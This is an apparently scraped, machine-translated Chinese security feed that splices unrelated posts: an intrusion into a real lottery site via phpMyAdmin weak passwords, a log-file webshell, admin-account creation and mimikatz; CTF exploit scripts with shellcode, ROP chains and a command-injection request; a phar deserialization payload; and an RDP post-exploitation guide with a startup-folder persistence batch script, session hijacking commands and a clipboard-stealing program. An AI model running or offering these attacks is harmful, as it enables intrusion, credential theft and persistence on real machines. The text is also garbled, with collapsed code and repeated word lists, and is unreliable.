所有动态

Chapter 1 Emergency Response-webshell Check Introduction Target machine account password root xjwebshell 1. The flag flag in the hacker webshell {

Get phpmyadmin weak password The ip of the lottery site is xxx through information, and the detection scan reveals that phpmyadmin exists. Through guessing, use the default weak password (root/root) to log in to phpmyadmin. Write shell to log file through phpmyadmin background sql query Use phpmyadmin's SQL query function to write a sentence Trojan to the log file. The process and command are as follows : 1. Turn on the log function: set global general_log=on; 2. Click the phpmyadmin variable to view the log file name : The log file here is test.php. 3. Execute SQL command and write a sentence to the log file : SELECT'?php assert($_POST['test']);'; 4. Return after successful execution. 5. View log files. 6. Add the user by connecting the kitchen knife and upload mimikatz. Use kitchen knife to connect to log file Trojan, xxx/test.php password :test Check and find that it is the system administrator system permission, just add the user and add it to the management group. The command is : C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add Upload mimikataz to the server. 7. 3389 connection and read the administrator password. (1) Direct telnet ip 3389 test found that it is accessible, so I directly connected 3389 to enter. (2) Or the following command is executed on the kitchen knife here to query the port open by 3389. Step 1 : tasklist /svc | findstr TermService query the process of remote desktop service Step 2 : netstat -ano | findstr **** //Check the port number corresponding to the remote desktop service process number. (3) Execute mimikatz and read the administrator group login password. (4) Use the obtained administrator/xxxx account password to log in to the server remotely. It was found that the server used phpmystudy to build a lottery station in batches. There were about a dozen sites, and they could access the website domain names on several servers at will. Some screenshots are as follows : System 1 : System 2 : System : Backstage 1 : Backstage 2 : Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247487003idx=1sn=5c85b34ce6ffb400fdf858737e34df3dchksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddcscene=21#wechat_redirect https://blog.csdn.net/weixin_39997829/article/details/109186917

Preliminary Competition web_ezcms swagger leaked test/test test account login, /sys/user/** has not done authentication, you can add a super administrator user, roleId is still unknown at this time. And the role module is not unauthorized. Continue reading the user module and discover the interface There is a roleid leak here, fill in the idfcf34b56-a7a2-4719-9236-867495e74c31 of the admin leaked earlier here GET/sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31 At this time, I know that the super administrator id is 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9, add the user { 'createWhere':0, 'deptId':'1', 'email':'', 'password':'123456', 'phone':'11111111111', 'roleIds':[ '11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9' ], 'sex':'fmale', 'username':'hacker' } Password field decoding failed, then check the log with the test account and found the key of aes: AbCdEfGhIjKlMnOp, and then the user was added successfully. After we added the user, we found the ping function in the module, but there is waf. Bypass waf and execute the command to get flag POST/sys/pingHTTP/1.1 Host: User-Agent:Mozilla/5.0 (Macintosh; IntelMacOSX10.15; rv:126.0)Gecko/20100101Firefox/126.0 Accept:application/json,text/javascript,*/*;q=0.01 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Content-Type:application/json;charset=UTF-8 authorization:eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmY2YzNGI1Ni1hN2EyLTQ3MTktOTIzNi04Njc0OTVlNzRjMzEiLCJqd3Qtcm9sZXMta2V5XyI6WyLotoXnuqfnrqHnkIblkZgiXSwiaXNzIjoieWluZ3h1ZS5jb20iLCJqd3QtcGVybWlzc2lvbnMta2V5IjpbInN5czp1c2VyOmxpc3QiLCJzeXM 6ZGVwdDp1cGRhdGUiLCJzeXM6ZGVwdDpkZXRhaWwiLCJzeXM6dXNlcjpyb2xlOnVwZGF0ZSIsInN5czpwZXJtaXNzaW9uOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmRlbGV0ZWQiLCJzeXM6cGVybWlzc2lvbjp1cGRhdGUiLCJzeXM6dXNlcjpkZXRhaWwiLCJzeXM6ZGVwdDpkZWxldGVkIiwic3lzOn JvbGU6dXBkYXRlIiwic3lzOnJvbGU6ZGV0YWlsIiwic3lzOmRlcHQ6bGlzdCIsInN5czpkZXB0OmFkZCIsInN5czp1c2VyOnVwZGF0ZSIsInN5czpyb2xlOmxpc3QiLCJzeXM6cm9sZTpkZWxldGVkIiwic3lzOnBlcm1pc3Npb246bGlzdCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uO mRlbGV0ZWQiLCJzeXM6bG9nOmRlbGV0ZWQiLCJzeXM6dXNlcjpyb2xlOmRldGFpbCIsInN5czpyb2xlOmFkZCIsInN5czpsb2c6bGlzdCJdLCJqd3QtdXNlci1uYW1lLWtleSI6ImFkbWluIiwiZXhwIjoxNzE2NzE3MjIwLCJpYXQiOjE3MTY3MTAwMjB9.9wcw8M2Ky0lFTbD2B7YaAmPKTl_EO0kJCB5J3bw8FkA X-Requested-With:XMLHttpRequest Content-Length:28 Origin: DNT:1 Sec-GPC:1 Connection:close Referer: Cookie:JSESSIONID=C701D746DA63E8FB94270AD6D2FD9ADB Sec-Fetch-Dest:empty Sec-Fetch-Mode:cors Sec-Fetch-Site:same-origin Priority:u=1 {'ip':'10.10.10.10-1||cat/flag'} Top Secret File-Code P importcv2 importnumpyasnp s=179093209181929149953346613617854206675976823277412565868079070299728290913658 fromCrypto.Util.numberimport* #p,q=(241627603783727624224706687817893681267, #347432454257893250496407965506777649463) ##assertp**2+q**2==s ##print(isPrime(p),isPrime(q)) #Img_path='flag_enc.png' #Img=cv2.imread(Img_path) #print(Img.shape) fromympy.solvers.diophantine.diophantineimportcornacchia ''' This place needs to be modified, decomposed from s, and just factordb f={7247215681561944590028089613581484765881:1,157606014243244438240601:1,5801674693:1,2:1,13513:1} ''' x1=cornacchia(1,1,s) fora,binx1: asserta**2+b**2==s ifisPrime(a)andisPrime(b): print(a,b) #I got p and q here fromCrypto.Util.numberimport* p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957 s=179093209181929149953346613617854206675976823277412565868079070299728290913658 assertisPrime(p)andisPrime(q)andp**2+q**2==s importcv2 path1='flag_enc.png' img=cv2.imread(path1) #print(img.shape) r,c,d=img.shape print(r,c) #i,j=101,201 fromtqdmimporttqdm a,b=p,q foriintqdm(range(r)): forjinrange(c): set1=set() set1.add((i,j)) i1,j1=i,j whileTrue: x=(i1+b*j1)%r y=((a*i1)+(a*b+1)*j1)%c i1,j1=x,y if(x,y)notinset1: set1.add((x,y)) else: ifi==0andj==0: Continue continue assertlen(set1)==190# are all default 190 #We found that it was 190 here. It was a coincidence that we just started to touch it later. #s1=s%190 #print(s1) #importnumpyasnp #defarnold(img,shuffle_times,a,b): #r,c,d=img.shape #p=np.zeros(img.shape,np.uint8) #print(r,c,d,shuffle_times) #forsinrange(shuffle_times): #foriinrange(r): #forjinrange(c): #x=(i+b*j)%r #y=((a*i)+(a*b+1)*j)%c #p[x,y,]=img[i,j,] #img=np.copy(p) #returnp #x1=arnold(img,11,p,q) #cv2.imwrite('flag3.png',x1) ##cv2.imwrite('flag1.png',img) # c=179093209181929149953346613617854206675976823277412565868079070299728290913658 p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957 importcv2 importnumpyasnp defarnold(img,shuffle_times,a,b): r,c,d=img.shape p=np.zeros(img.shape,np.uint8) print(r,c,d,shuffle_times) forsinrange(shuffle_times): foriinrange(r): forjinrange(c): x=(i+b*j)%r y=((a*i)+(a*b+1)*j)%c p[x,y,]=img[i,j,] img=np.copy(p) return img=cv2.imread('flag_enc.png') #print(img) c1=c%190 foriinrange(190): img=arnold(img,1,p,q) cv2.imwrite(f'flag{i+1}.png',img) ''' 1. Just enumerate violently. Anyway, the cycle is 190, just enumerate it all. When you find i=66, flag67.png is flag 2.flag{Ailuropoda_rnelanoleuca} ''' Persist in doing the right thing The data retrieved from the traffic packet is a hexadecimal system of an image Check his hexadecimal system and find that there is an additional data at the end of him It is a vim drawing command, install DrawIt directly, enter the command to draw the map GAME Play the game directly and get flag This is a real sign-in FunIoT gives a set of docker files, run a binary file on it, open the reverse directly, then combine dynamic debugging and static analysis to analyze the protocol format, and finally use one of the functions of reading files, and use //bypass comparison detection: Then read the flag: frommpwnimport* importzlib #p=remote('127.0.0.1',6768) p=remote('173.34.20.10',6768) header=b'FunIoT'#6 cmd=0x102 cmd_encode=int(cmd).to_bytes(2,'big') len=0x0101 length=int(len).to_bytes(2,'big') #content=b'getInfo:shadow' #content=b'getInfo:/lib/udev/rc_keymaps/asus_pc39.toml' content=b'getInfo://flag' content=content.ljust(0x101,b'\x00') check_sum=int(zlib.crc32(content)).to_bytes(4,'big') full_content=header+length+cmd_encode+check_sum+content #packet: #header:6bytes #length:2bytes #cmd:2bytes #checksum:4bytes #content:unknow context.log_level='debug' p.send(full_content) #p.interactive() importbase64 print(base64.b64decode(p.recv()).decode('utf-8')) #command:getInfo,setInfo,secret guess_hack The question requires inputting a maximum value and a minimum value, and then guessing the random number in this range. If you guess correctly, you will enter a stack overflow. The number of overflow characters is the number of times you guessed wrong, so you can enter two adjacent numbers, and then guess mistakes enough times, and then perform regular stack overflow utilization. Because the stack can be executed, and the detection requires that the payload is not empty, I directly wrote shellcode and performed a little XOR bypassed non-empty detection: #random%(max-min+1)+min frommpwnimport* context.log_level='debug' #p=process('./main') p=remote('173.34.20.233',9999) p.sendlineafter(b'ch:',b'1') p.sendlineafter(b'Enteraminimumandmaximumnumberfortheguessinggame:',b'12') foriinrange(99): p.sendlineafter(b'Guessanumber',b'1') p.sendlineafter(b'Guessanumberbetween',b'2') payload=b'a'*0x3c payload+=p32(0x0805dea9) payload+=asm(''' push0xffffffff4 popeax push0xffffffffffff popepx xoreax,ebx push0xff978cd0 popecx xorecx,ebx pushecx push0x6e69622f movebx,esp xorecx,ecx int0x80''') payload=payload.ljust(99,b'a') pause() p.sendlineafter(b'Congratulations!',payload) p.interactive() msg The stack overflow + format string vulnerability in the dictionary in the dictionary, which exploits the format string vulnerability to leak to canary and libc, and then the overflow return address is one gadget: frommpwnimport* #p=process('./main') p=remote('173.34.20.68',9999) p.sendlineafter(b'message:',b'%11$p') canary=int(p.recv(18),16) success(f'canary:{hex(canary)}') p.sendlineafter(b'message:',b'%3$p') libc=int(p.recv(14),16)-0x10e1f2 success(f'libc:{hex(libc)}') one=libc+0xe3b01 p.sendlineafter(b'message:',b'a'*0x28+p64(canary)+b'b'*8+p64(one)) pause() p.sendlineafter(b'message:',b'\x00'*0x10) p.interactive() stackover is also a classic stack overflow, but remote libc is a bit different from local. In addition, the return address is returned through leaf esp, [ecx-4], ret, which has not been successfully used. However, after controlling the program to various output places, it is determined that the stack environment is basically the same, so in the end, try not to rely on libc to utilize: frommpwnimport* #context.log_level='debug' #p=process('./stackover') p=remote(b'173.34.20.46',9999) p.sendafter(b'read:',b'a'*0x29b) p.recvuntil(b'a'*0x29b) canary=u32(b'\x00'+p.recv(3)) success(f'canary:{hex(canary)}') #pause() p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c-0x30-4)) p.recvuntil(b'a'*(0x29b+7+8+0x2c-0x30-4)) p.recv(4) p.recv(4) stack=u32(p.recv(4)) success(f'stack:{hex(stack)}') #pause() p.sendafter(b'read:',b'b'*(0x29b+0x18+7)) p.recvuntil(b'b'*(0x29b+0x18+7)) libc=u32(p.recv(4))-0x1aed5 success(f'libc:{hex(libc)}') #pause() p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c+0x54)) p.recvuntil(b'a'*(0x29b+7+8+0x2c+0x54)) elf_base=u32(p.recv(4))-0x3fb8 success(f'elf_base:{hex(elf_base)}') payload=b'c'*(0x29a-0x14-8) #execve0xc9510 #system0x41780 #puts0x6dc40 #payload+=p32(libc+0x6dc40) #payload+=p32(elf_base+0x1130) payload+=b'/bin/sh\x00' payload+=p32(elf_base+0x128e) #payload+=p32(elf_base+0x3fcc) #payload+=p32(0) payload+=p32(stack-0x50) payload+=p32(0) #payload+=p32(libc+0x18e363) #payload+=p32(libc+0x18e363) payload+=p32(0) payload+=p32(0) payload+=p32(canary) payload+=p32(0)*3 payload+=p32(stack-0x44) payload+=p32(elf_base+0x3fb8) payload+=b'/bin/sh\x00' pause() context.log_level='debug' p.sendafter(b'read:',payload) p.interactive() stackover-revenge provides addition and subtraction functions within 255. At first, no vulnerability was seen, but later I found that a little backdoor code was added to the normal process of the program: IDA presses F5 and cannot see here. The backdoor code in another place can complete the triggering conditions of the above code:

Morning CTF part web simplelogin yakit burst out the password, remember it should be a123456: pppp index.php has an arbitrary file read: ?php //upload.php error_reporting(0); highlight_file(__FILE__); class A { public $a; public function __destruct() { $s=$this-$a; $s(); } } class B{ public $cmd; function __invoke(){ return $this-start(); } function start(){ echo system($this-cmd); } } if(isset($_GET['file'])) { if(strstr($_GET['file'], 'flag')) { die('Get out!'); } echo file_get_contents($_GET['file']); } ? Read upload.php: !--?php error_reporting(0); if(isset($_FILES['file'])){ mkdir('upload'); $uid=uniqid(); $ext=explode('.',$_FILES['file']['name']); $ext=end($ext); move_uploaded_file($_FILES['file']['tmp_name'],'upload/'.$uuid.'.png'); echo'UploadSuccess!FilePath:upload/'.$uuid.'.png'; }-- The uploaded file will be changed to .png Try uploading the phar file and triggering the deserialization execution command with file_get_contents on the homepage: //phar.php ?php//phar.php classA{ public$a; publicfunction__destruct() { $s=$this-a; $s(); } } classB{ public$cmd; function__construct(){ $this-$cmd='catflag'; } function__invoke(){ return$this-start(); } functionstart(){ system($this-cmd); } } $b=newB(); $b-cmd='cat/flag'; $a=newA(); $a-a=$b; @unlink('phar.phar'); $phar=newPhar('phar.phar');//The suffix must be phar $phar-startBuffering(); $phar-setStub('?php__HALT_COMPILER();');//Set stub $phar-setMetadata($a);//Save custom meta-data into manifest $phar-addFromString('a.txt','abb');//Add the file to be compressed $phar-stopBuffering();//Signature automatically calculates ? Upload and access: misc ftp Traffic extraction zip, and then password is the same password password1234567890 crypto baby_Words on Zen with Buddha aes, but after XOR, the result is converted into characters, so you can turn it back and solve aes ruShiWoWen=[ '无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser' '未', 'li', 'blin', 'due', 'mul', 'pregnancy', 'san', 'black', 'naked', 'bean', 'special', 'div', 'reach', 'return', 'length', 'length', 'length', 'length', 'length', 'length', 'li', 'written', 'number', 'responsible', 'respect', 'ro', 'respect', 'respect', 'know', 'three', 'bing', 'no', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'Insight', 'thought', 'dream', 'until', 'remove', 'horrible', 'restrained', 'restrained', 'restrained', 'restrained', 'will', 'wisdom', 'old', 'toward', 'roar', 'foot', 'you', 'wang', 'you', 'won', 'mu', 'mu', 'light', 'protect', 'jin', 'harmony', 'going', 'treasure', 'win', 'tong', 'won', 'win', 'tong', 'medicine', 'teacher', 'little', 'living', 'pure', 'deal', 'mountain', 'good', 'pass', 'go', 'seven', 'not', 'come', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'Cause', 'Thousand', 'Five', 'Hundred', 'Ten Thousand', 'Flowers', 'Billions', 'Decision', 'Six', 'Fang', 'Name', 'Name', 'Tong', 'Yue', 'Yun', 'Dian', 'Miracle', 'Zun', 'tree', 'root', 'west', 'soap', 'flame', 'north', 'qing', 'number', 'element', 'improve', 'head', 'lower', 'silence', 'quantity', 'element', 'element', 'four', 'element', 'four', 'element', 'four', 'element', 'four', ' 'Do', 'Shi', 'Ga', 'Mu', 'Ni', 'Le', 'A', 'Du', 'Zhong', 'Yang', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong' 'action', 'in', 'empt', 'empt', 'compassion', 'worry', 'someone', 'satisfaction', 'stable', 'rest', 'day', 'night', 'cultivation', 'hold', 'heart', 'seeking', 'recitation', 'recitation', 'this', 'sutra', 'energy', 'death', 'elimination', 'elimination', 'toxic', 'harm', 'high', 'open', 'text', 'super', 'lift', 'cool', 'as if', 'thought', 'that', 'that', 'emperor', 'vi', 'true', 'ling', 'qian', 'shu', 'ha', 'respect', 'Gift', 'Feng', 'Ancestor', 'First', 'Filial Piety', 'Double', 'My Master', 'Stay', 'My Master', 'Love', 'Brother', 'Brother', 'First', 'Friend', 'Friend', 'Friend', 'Friend', 'Music', 'Zen', 'Clan', 'Home', 'My', 'My', 'Teaching', 'Sun', 'Time', 'Tire', 'Bulse', 'Yin', 'Yin', 'Difficult', 'Economic', 'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', ' 'kill', 'release', 'bridge', 'road', 'cove', 'little', 'draw', 'draw', 'draw', 'sleep', 'sweep', 'sweep', 'sweep', 'sweep', 'sweep', 'don', 'invest', 'invest'] enc='The person who recites the love is guarding the Mengzabao and lying the lying of the lying of the heart, and killing the lying of the heart, and worrying, and reciting the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the dec=b'' for i in enc: dec +=(ruShiWoWen.index(i) ^ 64).to_bytes(1, 'little') KEY=b'DASCTF@Key@^_^@Encode!Buddha!' IV=b'IV|DASCTF|OvO|IV' from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad cryptor=AES.new(KEY, AES.MODE_CBC, IV) # padded_data=pad(data.encode('utf-8'), AES.block_size) encrypted_data=cryptor.decrypt(dec) print(encrypted_data) re NormalAndroid When you open jadx, you only call one function in so, ida and look at it in the past: You can see something like a key and transform the key: surface: surface Then enter the encryption logic, which is an AES encryption, and the S box was modified in the past: So I just find a code implemented by AES to modify the S box, and then use the transformed key to decrypt it. Because the network competition was cut off, there was no script stored at that time, so I didn't make it: fromCrypto.Util.numberimportlong_to_bytes,bytes_to_long #https://github.com/bozhu/AES-Python/blob/master/aes.py Sbox=( 0xBE,0xB4,0x9F,0x70,0xDB,0xAD,0x31,0x30,0x6C,0x87, 0x74,0x27,0xC9,0x4C,0x67,0x62,0x0A,0x36,0x08,0xC8, 0x96,0x32,0x00,0xF1,0x38,0x65,0xEC,0xED,0x44,0x25, 0xAA,0x33,0x86,0xEF,0x0D,0x19,0x7D,0xD5,0x45,0xFB, 0x8D,0x61,0xFE,0x50,0x47,0x7E,0x7C,0xF9,0x01,0xDE, 0xFF,0xE1,0xAC,0x5D,0xB5,0x8E,0x48,0xBF,0x90,0x9D, 0x79,0xCB,0xA6,0xA9,0xFC,0x34,0xCF,0x63,0x5A,0x99, 0x98,0xB8,0x92,0x2D,0x02,0x89,0x2C,0x3B,0x15,0x72, 0x5E,0x60,0x29,0x6F,0x0B,0x24,0x6D,0x1C,0x5B,0xE0, 0x37,0xA4,0xCC,0x12,0x93,0xA7,0x09,0xC6,0xB6,0x8F, 0x04,0x20,0xE8,0x46,0xB1,0xAE,0x3A,0x68,0x81,0xCE, 0x2B,0x0C,0xB3,0x3E,0xC0,0x0E,0x4D,0xD8,0xD2,0xA2, 0x9E,0x56,0x28,0xB0,0x35,0x1B,0x5F,0xF5,0x05,0xBC, 0x3C,0x4F,0x8C,0xE6,0xF6,0x75,0xF4,0xF8,0xDD,0x11, 0xC1,0xB9,0x4E,0x97,0xD6,0xF2,0xE4,0xD1,0x82,0xD3, 0x03,0x8B,0x4B,0xCA,0x64,0xEB,0xAB,0x71,0xA1,0xBA, 0xA8,0x6A,0x1E,0x1A,0xA5,0x49,0x6E,0x53,0x66,0x39, 0x51,0xE9,0x26,0xC4,0xDA,0x55,0x3F,0xEA,0x85,0x8A, 0xD9,0x13,0x69,0x1F,0xE2,0x7F,0x2F,0xC5,0x88,0x57, 0x73,0xA3,0xE3,0x0F,0xBB,0x18,0xE5,0x42,0x22,0x52, 0x43,0x80,0x2A,0x6B,0x17,0xD7,0x23,0x06,0x58,0x1D, 0x7A,0x84,0xE7,0xEE,0xD0,0x41,0xD4,0xBD,0xA0,0xC3, 0xC2,0xFD,0x21,0x54,0xDF,0x7B,0xB7,0xF0,0xB2,0x77, 0x3D,0x07,0x78,0x16,0x9C,0x59,0xAF,0x2E,0x83,0xFA, 0x9B,0x95,0xF7,0x40,0x94,0xF3,0xCD,0xC7,0x91,0x10, 0xDC,0x4A,0x14,0x9A,0x5C,0x76 ) InvSbox=[Sbox.index(i)foriinrange(256)] #learntfromhttp://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c xtime=lambdaa:(((a1)^0x1B)0xFF)if(a0x80)else(a1) Rcon=( 0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40, 0x80,0x1B,0x36,0x6C,0xD8,0xAB,0x4D,0x9A, 0x2F,0x5E,0xBC,0x63,0xC6,0x97,0x35,0x6A, 0xD4,0xB3,0x7D,0xFA,0xEF,0xC5,0x91,0x39, ) deftext2matrix(text): matrix=[] foriinrange(16): byte=(text(8*(15-i)))0xFF ifi%4==0: matrix.append([byte]) else: matrix[i//4].append(byte) returnmatrix defmatrix2text(matrix): text=0 foriinrange(4): forjinrange(4): text|=(matrix[i][j](120-8*(4*i+j))) returntext classAES: def__init__(self,master_key): self.change_key(master_key) defchange_key(self,master_key): self.round_keys=text2matrix(master_key) #printself.round_keys foriinrange(4,4*11): self.round_keys.append([]) ifi%4==0: byte=self.round_keys[i-4][0]\ ^Sbox[self.round_keys[i-1][1]]\ ^Rcon[i//4] self.round_keys[i].append(byte) forjinrange(1,4): byte=self.round_keys[i-4][j]\ ^Sbox[self.round_keys[i-1][(j+1)%4]] self.round_keys[i].append(byte) else: forjinrange(4): byte=self.round_keys[i-4][j]\ ^self.round_keys[i-1][j] self.round_keys[i].append(byte) #printself.round_keys defencrypt(self,plaintext): self.plain_state=text2matrix(plaintext) self.__add_round_key(self.plain_state,self.round_keys[:4]) foriinrange(1,10): self.__round_encrypt(self.plain_state,self.round_keys[4*i:4*(i+1)]) self.__sub_bytes(self.plain_state) self.__shift_rows(self.plain_state) self.__add_round_key(self.plain_state,self.round_keys[40:]) returnmatrix2text(self.plain_state) defdecrypt(self,ciphertext): self.cipher_state=text2matrix(ciphertext) self.__add_round_key(self.cipher_state,self.round_keys[40:]) self.__inv_shift_rows(self.cipher_state) self.__inv_sub_bytes(self.cipher_state) foriinrange(9,0,-1): self.__round_decrypt(self.cipher_state,self.round_keys[4*i:4*(i+1)]) self.__add_round_key(self.cipher_state,self.round_keys[:4]) returnmatrix2text(self.cipher_state) def__add_round_key(self,s,k): foriinrange(4): forjinrange(4): s[i][j]^=k[i][j] def__round_encrypt(self,state_matrix,key_matrix): self.__sub_bytes(state_matrix) self.__shift_rows(state_matrix) self.__mix_columns(state_matrix) self.__add_round_key(state_matrix,key_matrix) def__round_decrypt(

Recently, the administrator in the project got rid of the administrator after rdp was mounted, and thought that he would sort out the use methods for rdp if he had time.: Copying files based on the use of hanging disks is not much. You can decide whether to drag the file or drop the startup item according to the different hanging disks. There are some applications that automatically monitor and copy files, such as: https://github.com/cnucky/DarkGuardianDarkGuardian is a tool used to monitor TSCLIENT (hang disk) after RDP login. When the tool is running in the background, it can automatically obtain the list of files on the hanging disk, download the specified files, copy Trojan files to the startup items on the mounted hard disk, etc. RDPInception This method is relatively useless. The principle is to use the bat script to put it in the server startup item/winlogon execution script, and wait for the administrator to hang up the disk and restart the execution command. @echo off echo Updating Windows. @echo off timeout 1 nul 21 mkdir \\tsclient\c\temp nul 21 mkdir C:\temp nul 21 copy run.bat C:\temp nul 21 copy run.bat \\tsclient\c\temp nul 21 del /q %TEMP%\temp_00.txt nul 21 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup* echo|%dirs%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt' echo|%dirs2%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt' for /F 'tokens=*' %%a in (%TEMP%\temp_00.txt) DO ( copy run.bat '%%a' nul 21 copy C:\temp\run.bat '%%a' nul 21 copy \\tsclient\c\temp\run.bat '%%a' nul 21 ) del /q %TEMP%\temp_00.txt nul 21 REM if 'WINDOMAIN'='%USERDOMAIN%'( cmd.exe /c calc.exe ) RDP Session Hijacking The practical command is tscon, which is normal to switch to a different session through a password. However, under system, you can switch different user sessions without using a password. Switch a session to a different session. This technique is mainly aimed at win7 and above environments. The overall application scenario is: if Windows 2012 or above does not save plaintext by default, you can switch to the target host, or if the current user in the domain is a local user, you can switch to the domain user permissions. First, use psexec locally to mention the system. (Here you can create system services manually to implement them.) You can also use shift/Utilman backdoor to log in to the desktop without password. 1.psexec C:\Windows\system32quser Username Session Name ID Status Idle Time Login Time administrator rdp-tcp#1 1 is running. 2020/12/14 11:14 test rdp-tcp#0 2 running 1:02 2020/12/14 13:04 C:\Windows\system32tscon 2 rdp-tcp#1 2. Services quser sc create sesshijack binpath='cmd.exe /k tscon 2 /dest:rdp-tcp#1' net start sesshijack 3. mimikatz privilege:debug ts:sessions toekn:elevate ts:remote /id:2 4. Shift password-free hijacking com hijacking Shift backdoor in webshell rdpclip.exe utilization The RDP service can copy and paste text and files. It is mainly implemented through this rdpclip.exe process. If you want to know the specific operation in copying, you can use ClipSpy to view the changes in the clipboard. I saw many disclosed methods of using the copyright in ATTCK to obtain the text content of copy, and there is also an idea given in https://research.checkpoint.com/2019/reverse-rdp-attack-code-execution-on-rdp-clients/HOOK RDPClip.exe 1. Shear board monitoring Every 10 seconds, read the clipboard content and save it locally. #include exception #include iostream #include ostream #include stdexcept #include string #include windows.h #include fstream using namespace std; class RaiiClipboard { public: RaiiClipboard() { if (!OpenClipboard(NULL)) throw runtime_error('Can't open clipboard.'); //. or define some custom exception class for clipboard errors. } ~RaiiClipboard() { CloseClipboard(); } //Ban copy private: RaiiClipboard(const RaiiClipboard); RaiiClipboard operator=(const RaiiClipboard); }; class RaiiTextGlobalLock { public: explicit RaiiTextGlobalLock(HANDLE hData) : m_hData(hData) { m_psz=static_castconst char*(GlobalLock(m_hData)); if (!m_psz) throw runtime_error('Can't acquire lock on clipboard text.'); } ~RaiiTextGlobalLock() { GlobalUnlock(m_hData); } const char* Get() const { return m_psz; } private: HANDLE m_hData; const char* m_psz; //Ban copy RaiiTextGlobalLock(const RaiiTextGlobalLock); RaiiTextGlobalLock operator=(const RaiiTextGlobalLock); }; string GetClipboardText() { RaiiClipboard clipboard; HANDLE hData=GetClipboardData(CF_TEXT); if (hData==NULL) { return ''; //throw runtime_error('Can't get clipboard text.'); } RaiiTextGlobalLock textGlobalLock(hData); string text(textGlobalLock.Get()); return text; } void SaveData(string data) { ofstream out('info.txt', ios:app); if (out.is_open()) { out data + '\n'; out '------------------------------\n'; out.close(); } } int main() { static const int kExitOk=0; static const int kExitError=1; string data1=''; string data2=''; try { while (true) { data2=GetClipboardText(); if (data1 !=data2) { cout data2 endl; SaveData(data2); } else { cout 'waiting for clip acting.' endl; Sleep(300000); } data1=data2; Sleep(10000); } return kExitOk; } catch (const exception e) { cerr '*** ERROR: ' e.what() endl; return kExitError; } } According to the Cheesy Rumbles article. You can also use Get-ClipboardContents.ps1 to get clipboard content, and it can be obtained across multiple rdp interfaces. 3924 888 rdpclip.exe x64 3 DMZ2\rasta inject 3924 x64 smb powershell-import D:\Tools\Get-ClipboardContents.ps1 powershell Get-ClipboardContents -PollInterval 1 2. Counterattack rdp How to transfer files to the administrator in reverse without hanging disks? I found two methods online. 1. The Hook GetClipboardData function and DragQueryFileW function are similar. After two days of debugging, I finally found it with the help of all the brothers. 2. Later I thought that I could get the clipboard contents in the previous section, so I could modify the file he copied. CVE-2019-0887 Li Yongde has the same idea as given in paper. Since wcsrchr(szFile, '\') is used to receive addresses, Microsoft also supports./this kind of path. The reason for the vulnerability is similar to that of winrar path. Use the detours library to hook the GetClipboardData function and DragQueryFileW function, add file data and paths to achieve the final effect Replace clipboard file #include iostream #include windows.h #include shlobj.h int CopyFileToClipboard(char szFileName[]); int main() { CopyFileToClipboard('C:\\windows\\system32\\cmd.exe'); return 0; } int 